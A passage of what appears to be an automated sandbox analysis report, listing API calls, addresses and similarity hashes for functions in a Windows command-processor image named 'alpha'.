                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                      • String ID:
                                                                                      • API String ID: 4291973834-0
                                                                                      • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                      • Instruction ID: a6e33362265b251b22fd1a744eba515df69cefe95028110cbd91f614d4653b99
                                                                                      • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                      • Instruction Fuzzy Hash: C941D921A1864392F6F4BB30E8C0275A2A9AF4C746F940436D91EB77A0DF7DED408761
                                                                                      Function 00007FF793754A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1207 7ff793754a14-7ff793754a3e GetEnvironmentStringsW 1208 7ff793754aae-7ff793754ac5 1207->1208 1209 7ff793754a40-7ff793754a46 1207->1209 1210 7ff793754a48-7ff793754a52 1209->1210 1211 7ff793754a59-7ff793754a8f GetProcessHeap HeapAlloc 1209->1211 1210->1210 1212 7ff793754a54-7ff793754a57 1210->1212 1213 7ff793754a9f-7ff793754aa9 FreeEnvironmentStringsW 1211->1213 1214 7ff793754a91-7ff793754a9a memmove 1211->1214 1212->1210 1212->1211 1213->1208 1214->1213
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A28
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A66
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A7D
                                                                                      • memmove.MSVCRT(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A9A
                                                                                      • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754AA2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                      • String ID:
                                                                                      • API String ID: 1623332820-0
                                                                                      • Opcode ID: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                                                                      • Instruction ID: 95d4df94d86eb06f24399620539ece9ad3a42f0006c058c1ffe19f7d162591e8
                                                                                      • Opcode Fuzzy Hash: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                                                                      • Instruction Fuzzy Hash: 6511A722A1874182EEA4AF65B484079FBA4FB8DF81F899039DE4F13744DF3DE4418760
                                                                                      Function 00007FF793755CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                      • String ID:
                                                                                      • API String ID: 1826527819-0
                                                                                      • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                      • Instruction ID: cf991dfe946150cf86dd423122d1c9b225a329de7101ba998f328d310628cede
                                                                                      • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                      • Instruction Fuzzy Hash: 63016131908682CAE6A47B35A4941B8FA69FF8E756FC45134D54F163A1DF3C9048CB60
                                                                                      Function 00007FF793753060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF793751EA0: wcschr.MSVCRT(?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF793770D54), ref: 00007FF793751EB3
                                                                                      • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7937492AC), ref: 00007FF7937530CA
                                                                                      • SetErrorMode.KERNELBASE ref: 00007FF7937530DD
                                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7937530F6
                                                                                      • SetErrorMode.KERNELBASE ref: 00007FF793753106
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$FullNamePathwcschr
                                                                                      • String ID:
                                                                                      • API String ID: 1464828906-0
                                                                                      • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                      • Instruction ID: 5b11e0cabb63fba5ec371f99ba4730bd387160f705bac049b412ec98dba40d75
                                                                                      • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                      • Instruction Fuzzy Hash: 41310721A0861582F6B9AF36A48017EF665EB4DB90FD48236DA4E573E0DF7DE8458320
                                                                                      Function 00007FF79374CA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                      • API String ID: 2221118986-3416068913
                                                                                      • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                      • Instruction ID: 1dd00eea0e31be46af8d4a2878d19f1a081495407168b3b8dfa40ac4ea44f51f
                                                                                      • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                      • Instruction Fuzzy Hash: 6D110625B0864381FFF4EB31A1C42B992999F8CBA4F984235DE2D6B3D5DE2CE0408360
                                                                                      Function 00007FF79374BE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memsetwcschr
                                                                                      • String ID: 2$COMSPEC
                                                                                      • API String ID: 1764819092-1738800741
                                                                                      • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                      • Instruction ID: 401d013b1083e3836b6698e574be70b93731c1fb4dd8b1b5887cb2deaa50f255
                                                                                      • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                      • Instruction Fuzzy Hash: AC517021A0865385FBF8BB3594C9379A2DE9F8D784FC44031DA8D662D6DE2CFC448761
                                                                                      Function 00007FF793752EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                      • String ID:
                                                                                      • API String ID: 4254246844-0
                                                                                      • Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                      • Instruction ID: c039c71613fb496dcb0a695a45d460ec9e5853126bc18bb05143b98c1dedb4cb
                                                                                      • Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                      • Instruction Fuzzy Hash: AA41D622A0874686FEB9AB20E4C4379E7A8EF8D790FC44432D94E577D0DF3CE4418620
                                                                                      Function 00007FF79375498C Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                      • String ID:
                                                                                      • API String ID: 2643372051-0
                                                                                      • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                      • Instruction ID: aed86b566aed323ecd274d5598a41411d1de61c39f514bb8f8e72ccd8f9b9593
                                                                                      • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                      • Instruction Fuzzy Hash: 38F0D662A1DB8285EBA4AB35F4C4075EAE5FF4D7A1B869234C52F13390DF3C94448260
                                                                                      Function 00007FF793755A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _get_osfhandle$ConsoleMode
                                                                                      • String ID:
                                                                                      • API String ID: 1591002910-0
                                                                                      • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                      • Instruction ID: 6e0270f3415e1c20a7153add33fbe9e3d80da1c09cc44a434a9427a2150cf3f5
                                                                                      • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                      • Instruction Fuzzy Hash: 22F07A34A09642CBE6A8AB30E8C5078BBE4FB8D712F844174C90F63360DF3CA5058B61
                                                                                      Function 00007FF79375291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: DriveType
                                                                                      • String ID: :
                                                                                      • API String ID: 338552980-336475711
                                                                                      • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                      • Instruction ID: 93237230a9f991ab61e453467b9c04a3d2c66d58becc0472cfe4ca180cf1aada
                                                                                      • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                      • Instruction Fuzzy Hash: 6DE09267618640C7E770AF60E4910AAF7A0FB8D349FC41525EA8E93764DB3CD249CF18
                                                                                      Function 00007FF793755AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF79374CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDA6
                                                                                        • Part of subcall function 00007FF79374CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDBD
                                                                                      • GetConsoleTitleW.KERNELBASE ref: 00007FF793755B52
                                                                                        • Part of subcall function 00007FF793754224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF793754297
                                                                                        • Part of subcall function 00007FF793754224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7937542D7
                                                                                        • Part of subcall function 00007FF793754224: memset.MSVCRT ref: 00007FF7937542FD
                                                                                        • Part of subcall function 00007FF793754224: memset.MSVCRT ref: 00007FF793754368
                                                                                        • Part of subcall function 00007FF793754224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF793754380
                                                                                        • Part of subcall function 00007FF793754224: wcsrchr.MSVCRT ref: 00007FF7937543E6
                                                                                        • Part of subcall function 00007FF793754224: lstrcmpW.KERNELBASE ref: 00007FF793754401
                                                                                      • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF793755BC7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                      • String ID:
                                                                                      • API String ID: 497088868-0
                                                                                      • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                      • Instruction ID: eaf17062f21016f1e6bc0f9c8175ced092006246eae238aef43b3df1c3c64531
                                                                                      • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                      • Instruction Fuzzy Hash: A6318420B0C64282FAB8B731A4D457DF299EF8DB90F845436E94EA7B95DE3CE5058720
                                                                                      Function 00007FF793759A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Concurrency::cancel_current_taskmalloc
                                                                                      • String ID:
                                                                                      • API String ID: 1412018758-0
                                                                                      • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                      • Instruction ID: f59dcc5536fd22f389055c3163191533b997f1c1db1b86519b9fe18bbef171c4
                                                                                      • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                      • Instruction Fuzzy Hash: 59E0ED41F5A70B91FEBD3B7268C117492595F6E741E9C2431DD1E25382EE2CE195C331
                                                                                      Function 00007FF79374CD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDA6
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDBD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcess
                                                                                      • String ID:
                                                                                      • API String ID: 1617791916-0
                                                                                      • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                      • Instruction ID: cf4d31980cf72856f8e0e6252a37df807f68fc2ceb7b29550c7bc47000b0d00d
                                                                                      • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                      • Instruction Fuzzy Hash: 2CF08135A1864286FBA4AB25F8C0078FBE9FB8DB01B989035D90E23354DF3CE441CB20
                                                                                      Function 00007FF793754C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: exit
                                                                                      • String ID:
                                                                                      • API String ID: 2483651598-0
                                                                                      • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                      • Instruction ID: 23f8421869b77d8826dedc186944697a66144715d6c2e9c2f573d99d3b5c811c
                                                                                      • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                      • Instruction Fuzzy Hash: 3FC08C30B0C64687FBBC7B3128D507E99EC6F8C302F84683DCA0B95382DE2CD8088620
                                                                                      Function 00007FF793755508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: DefaultUser
                                                                                      • String ID:
